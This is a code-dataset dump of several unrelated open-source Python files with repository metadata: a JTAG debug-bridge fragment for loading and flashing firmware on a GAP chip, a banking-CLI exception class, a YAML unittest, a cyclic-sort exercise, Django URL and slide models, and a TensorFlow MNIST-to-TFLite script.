super(gap_debug_bridge, self).__init__(config=config, binaries=binaries, verbose=verbose)
self.fimages = fimages
self.start_cores = False
def stop(self):
# Reset the chip and tell him we want to load via jtag
# We keep the reset active until the end so that it sees
# the boot mode as soon as it boots from rom
if self.verbose:
print ("Notifying to boot code that we are doing a JTAG boot")
self.get_cable().chip_reset(True)
self.get_cable().jtag_set_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, (BOOT_MODE_JTAG << 1) | 1)
self.get_cable().chip_reset(False)
# Now wait until the boot code tells us we can load the code
if self.verbose:
print ("Waiting for notification from boot code")
while True:
reg_value = self.get_cable().jtag_get_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, (BOOT_MODE_JTAG << 1) | 1)
if reg_value == CONFREG_BOOT_WAIT:
break
print ("Received for notification from boot code")
# Stall the FC
self.write(0x1B300000, 4, [0, 0, 1, 0])
return 0
def load_jtag(self, binaries):
if self.verbose:
print ('Loading binary through jtag')
if self.stop() != 0:
return -1
# Load the binary through jtag
if self.verbose:
print ("Loading binaries")
for binary in binaries:
if self.load_elf(binary=binary):
return 1
# Be careful to set the new PC only after the code is loaded as the prefetch
# buffer is immediately fetching instructions and would get wrong instructions
self.write(0x1B302000, 4, [0x80, 0x00, 0x00, 0x1c])
self.start_cores = True
return 0
def start(self):
if self.start_cores:
print ('Starting execution')
# Unstall the FC so that it starts fetching instructions from the loaded binary
self.write(0x1B300000, 4, [0, 0, 0, 0])
return 0
def load_jtag_hyper(self, binaries):
if self.verbose:
print ('Loading binary through jtag_hyper')
# Reset the chip and tell him we want to load from hyper
# We keep the reset active until the end so that it sees
# the boot mode as soon as it boots from rom
if self.verbose:
print ("Notifying to boot code that we are doing a JTAG boot from hyperflash")
self.get_cable().chip_reset(True)
self.get_cable().jtag_set_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, BOOT_MODE_JTAG_HYPER)
self.get_cable().chip_reset(False)
return 0
def flash(self, fimages):
MAX_BUFF_SIZE = (350*1024)
f_path = fimages[0]
addrHeader = self._get_binary_symbol_addr('flasherHeader')
addrImgRdy = addrHeader
addrFlasherRdy = addrHeader + 4
addrFlashAddr = addrHeader + 8
addrIterTime = addrHeader + 12
addrBufSize = addrHeader + 16
# open the file in read binary mode
f_img = open(f_path, 'rb')
f_size = os.path.getsize(f_path)
lastSize = f_size % MAX_BUFF_SIZE;
if(lastSize):
n_iter = f_size // MAX_BUFF_SIZE + 1;
else:
n_iter = f_size // MAX_BUFF_SIZE
flasher_ready = self.read_32(addrFlasherRdy)
while(flasher_ready == 0):
flasher_ready = self.read_32(addrFlasherRdy)
flasher_ready = 0;
addrBuffer = self.read_32((addrHeader+20))
indexAddr = 0
self.write_32(addrFlashAddr, 0)
self.write_32(addrIterTime, n_iter)
for i in range(n_iter):
if (lastSize and i == (n_iter-1)):
buff_data = f_img.read(lastSize)
self.write(addrBuffer, lastSize, buff_data)
self.write_32(addrBufSize, ((lastSize + 3) & ~3))
else:
buff_data = f_img.read(MAX_BUFF_SIZE)
self.write(addrBuffer, MAX_BUFF_SIZE, buff_data)
self.write_32(addrBufSize, MAX_BUFF_SIZE)
self.write_32(addrImgRdy, 1)
self.write_32(addrFlasherRdy, 0)
if (i!=(n_iter-1)):
flasher_ready = self.read_32(addrFlasherRdy)
while(flasher_ready == 0):
flasher_ready = self.read_32(addrFlasherRdy)
f_img.close()
return 0
| 4,374 | 16 | 185 |
cbd42cf638d83f88f7801c0085050d6aff52a697 | 305 | py | Python | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | class NoContent(Exception):
"""
Triggert, wenn das ausgewählte Objekt kein Inhalt enthält
Caller: CLI
"""
| 25.416667 | 71 | 0.629508 | class NoContent(Exception):
"""
Triggert, wenn das ausgewählte Objekt kein Inhalt enthält
Caller: CLI
"""
def __init__(self, command):
self.command = command
def __str__(self):
details = f"\n|> Kein Eintrag für {self.command!r} gefunden!\n"
return details
| 131 | 0 | 53 |
85da6d6a1091ae5222952adc2d51828314426605 | 887 | py | Python | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | 9 | 2017-09-15T14:35:28.000Z | 2021-10-04T13:21:51.000Z | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | null | null | null | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | 3 | 2018-11-06T10:15:14.000Z | 2021-04-08T08:02:22.000Z | import unittest
import yaml
import logging
logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(format='%(message)s')
logger = logging.getLogger(__name__)
class ExecutablesTest(unittest.TestCase):
"""Check if we can get the map of executables"""
def test_getexemap(self):
"""Can we construct the dictionary for executables?"""
yamldata = """executables:
atom: gridatom
skgen: skgen.sh
lammps: mpirun -n 4 lmp_mpi
bands: dp_bands band.out bands
"""
exedict = yaml.load(yamldata).get('executables', None)
try:
for key, val in exedict.items():
logger.debug ("{:>10s} : {}".format(key, " ".join(val.split())))
except AttributeError:
# assume no executables are remapped
pass
if __name__ == '__main__':
unittest.main()
| 28.612903 | 80 | 0.609921 | import unittest
import yaml
import logging
logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(format='%(message)s')
logger = logging.getLogger(__name__)
class ExecutablesTest(unittest.TestCase):
"""Check if we can get the map of executables"""
def test_getexemap(self):
"""Can we construct the dictionary for executables?"""
yamldata = """executables:
atom: gridatom
skgen: skgen.sh
lammps: mpirun -n 4 lmp_mpi
bands: dp_bands band.out bands
"""
exedict = yaml.load(yamldata).get('executables', None)
try:
for key, val in exedict.items():
logger.debug ("{:>10s} : {}".format(key, " ".join(val.split())))
except AttributeError:
# assume no executables are remapped
pass
if __name__ == '__main__':
unittest.main()
| 0 | 0 | 0 |
78cf8f3577f10272dda42004ec090137bb082d35 | 733 | py | Python | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null |
"""
[E] We are given an unsorted array containing 'n' numbers taken from the range 1 to 'n'.
The array has some numbers appearing twice, find all these duplicate numbers without using any extra space.
Example 1:
Input: [3, 4, 4, 5, 5]
Output: [4, 5]
"""
# Time: O(n) Space: O(1)
main() | 19.810811 | 107 | 0.608458 |
"""
[E] We are given an unsorted array containing 'n' numbers taken from the range 1 to 'n'.
The array has some numbers appearing twice, find all these duplicate numbers without using any extra space.
Example 1:
Input: [3, 4, 4, 5, 5]
Output: [4, 5]
"""
# Time: O(n) Space: O(1)
def find_all_duplicates(nums):
i = 0
while i < len(nums):
j = nums[i] - 1
if nums[i] != nums[j]:
nums[i], nums[j] = nums[j], nums[i] # swap
else:
i += 1
duplicateNumbers = []
for i in range(len(nums)):
if nums[i] != i + 1:
duplicateNumbers.append(nums[i])
return duplicateNumbers
def main():
print(find_all_duplicates([3, 4, 4, 5, 5]))
print(find_all_duplicates([5, 4, 7, 2, 3, 5, 3]))
main() | 393 | 0 | 45 |
75748216c6dbe303e57780eeeb96ed586dc84164 | 212 | py | Python | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | null | null | null | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | 5 | 2021-03-19T02:34:36.000Z | 2021-09-22T18:56:49.000Z | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | null | null | null |
from django.conf.urls import url
from django.conf.urls import include
from myapp import views
urlpatterns = [
url(r'^$', views.dashBoard, name='dashboard'),
#url(r'^myapp/', include('myapp.urls')),
]
| 17.666667 | 50 | 0.683962 |
from django.conf.urls import url
from django.conf.urls import include
from myapp import views
urlpatterns = [
url(r'^$', views.dashBoard, name='dashboard'),
#url(r'^myapp/', include('myapp.urls')),
]
| 0 | 0 | 0 |
0f453badacab02520c8d1fd266842e0f60f5ff75 | 2,214 | py | Python | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
import numpy as np
import tensorflow_datasets as tfds
(ds_train, ds_test), ds_info = tfds.load(
'mnist',
split=['train', 'test'],
shuffle_files=True,
as_supervised=True,
with_info=True,
)
def normalize_img(image, label):
"""Normalize image"""
return tf.cast(image, tf.float32) / 255., label
ds_train = ds_train.map( normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_train = ds_train.cache()
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(128)
ds_train = ds_train.prefetch(tf.data.AUTOTUNE)
""" Testing pipeline"""
ds_test = ds_test.map(
normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_test = ds_test.batch(128)
ds_test = ds_test.cache()
ds_test = ds_test.prefetch(tf.data.AUTOTUNE)
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
model.compile(
optimizer=tf.keras.optimizers.Adam(0.001),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
run_eagerly = True
)
model.fit(
ds_train,
epochs=6,
validation_data=ds_test,
)
"""Custom Inference test"""
model.summary
count = 0
#for data in ds_train:
# print(model(data[0]))
""" Converting to TFlite"""
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
with open('model.tflite', 'wb') as f:
f.write(tflite_model)
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
""" Giving random input to model to see if it is computing properly"""
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data)
print("Evaluate on test data")
results = model.evaluate(ds_test, batch_size=128)
print("test loss, test acc:", results)
| 28.384615 | 77 | 0.749322 | import tensorflow as tf
import numpy as np
import tensorflow_datasets as tfds
(ds_train, ds_test), ds_info = tfds.load(
'mnist',
split=['train', 'test'],
shuffle_files=True,
as_supervised=True,
with_info=True,
)
def normalize_img(image, label):
"""Normalize image"""
return tf.cast(image, tf.float32) / 255., label
ds_train = ds_train.map( normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_train = ds_train.cache()
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(128)
ds_train = ds_train.prefetch(tf.data.AUTOTUNE)
""" Testing pipeline"""
ds_test = ds_test.map(
normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_test = ds_test.batch(128)
ds_test = ds_test.cache()
ds_test = ds_test.prefetch(tf.data.AUTOTUNE)
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
model.compile(
optimizer=tf.keras.optimizers.Adam(0.001),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
run_eagerly = True
)
model.fit(
ds_train,
epochs=6,
validation_data=ds_test,
)
"""Custom Inference test"""
model.summary
count = 0
#for data in ds_train:
# print(model(data[0]))
""" Converting to TFlite"""
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
with open('model.tflite', 'wb') as f:
f.write(tflite_model)
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
""" Giving random input to model to see if it is computing properly"""
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data)
print("Evaluate on test data")
results = model.evaluate(ds_test, batch_size=128)
print("test loss, test acc:", results)
| 0 | 0 | 0 |
d9f2f20d45c541482fec86d710bf5f795fb2f806 | 2,192 | py | Python | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | #! -*- encoding: utf-8 -*-
try:
from urllib import unquote
except ImportError: # assume python3
from urllib.parse import unquote
from string import punctuation
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.sites.models import Site
from mezzanine.pages.models import Page
from mezzanine.core.models import Orderable
from mezzanine.core.fields import FileField
class Slide(Orderable):
"""
Allows for pretty banner images across the top of pages that will cycle
through each other with a fade effect.
"""
page = models.ForeignKey(Page)
file = FileField(_('File'), max_length=200, upload_to='slides', format='Image')
description = models.CharField(_('Description'), blank=True, max_length=200)
caption = models.CharField(_('Caption'), blank=True, max_length=200)
url = models.URLField(_(u'Link'), max_length=255, default="", blank=True, null=True)
public = models.BooleanField(default=True, blank=True, verbose_name=u"Público",)
site = models.ForeignKey(Site)
objects = SlideManager()
def save(self, *args, **kwargs):
"""
If no description is given when created, create one from the
file name.
"""
if not self.id and not self.description:
name = unquote(self.file.url).split('/')[-1].rsplit('.', 1)[0]
name = name.replace("'", '')
name = ''.join([c if c not in punctuation else ' ' for c in name])
# str.title() doesn't deal with unicode very well.
# http://bugs.python.org/issue6412
name = ''.join([s.upper() if i == 0 or name[i - 1] == ' ' else s
for i, s in enumerate(name)])
self.description = name
super(Slide, self).save(*args, **kwargs)
| 34.793651 | 88 | 0.646442 | #! -*- encoding: utf-8 -*-
try:
from urllib import unquote
except ImportError: # assume python3
from urllib.parse import unquote
from string import punctuation
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.sites.models import Site
from mezzanine.pages.models import Page
from mezzanine.core.models import Orderable
from mezzanine.core.fields import FileField
class SlideManager(models.Manager):
use_for_related_fields = True
def get_public_slides(self):
return super(SlideManager, self).get_queryset().filter(public=True)
class Slide(Orderable):
"""
Allows for pretty banner images across the top of pages that will cycle
through each other with a fade effect.
"""
page = models.ForeignKey(Page)
file = FileField(_('File'), max_length=200, upload_to='slides', format='Image')
description = models.CharField(_('Description'), blank=True, max_length=200)
caption = models.CharField(_('Caption'), blank=True, max_length=200)
url = models.URLField(_(u'Link'), max_length=255, default="", blank=True, null=True)
public = models.BooleanField(default=True, blank=True, verbose_name=u"Público",)
site = models.ForeignKey(Site)
objects = SlideManager()
class Meta:
verbose_name = _('Slide')
verbose_name_plural = _('Slides')
ordering = ['_order']
def __unicode__(self):
return self.description
def save(self, *args, **kwargs):
"""
If no description is given when created, create one from the
file name.
"""
if not self.id and not self.description:
name = unquote(self.file.url).split('/')[-1].rsplit('.', 1)[0]
name = name.replace("'", '')
name = ''.join([c if c not in punctuation else ' ' for c in name])
# str.title() doesn't deal with unicode very well.
# http://bugs.python.org/issue6412
name = ''.join([s.upper() if i == 0 or name[i - 1] == ' ' else s
for i, s in enumerate(name)])
self.description = name
super(Slide, self).save(*args, **kwargs)
| 116 | 171 | 77 |